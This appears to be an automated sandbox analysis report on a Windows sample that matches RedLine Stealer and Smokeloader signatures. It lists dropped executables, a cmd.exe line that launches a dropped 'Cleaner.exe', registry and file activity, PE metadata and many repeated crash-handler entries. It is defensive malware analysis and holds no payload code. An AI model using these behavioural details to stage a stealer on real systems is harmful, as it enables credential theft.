Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C28C2	33_2_00007FFBB00C28C2
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C2EE5	33_2_00007FFBB00C2EE5
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C1B2E	33_2_00007FFBB00C1B2E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00CA91D	33_2_00007FFBB00CA91D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C394F	33_2_00007FFBB00C394F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C553E	33_2_00007FFBB00C553E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C3F72	33_2_00007FFBB00C3F72
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C9B6D	33_2_00007FFBB00C9B6D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C678F	33_2_00007FFBB00C678F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C57D8	33_2_00007FFBB00C57D8
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C4601	33_2_00007FFBB00C4601
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Code function: 33_2_00007FFBB00C4EDD	33_2_00007FFBB00C4EDD

PE file contains executable resources (Code or Archives)

Source: file.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568

Source: Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winEXE@17/52@1/5

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source:	Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Binary contains a suspicious time stamp

Source: Cleaner.exe.0.dr

Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]			Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
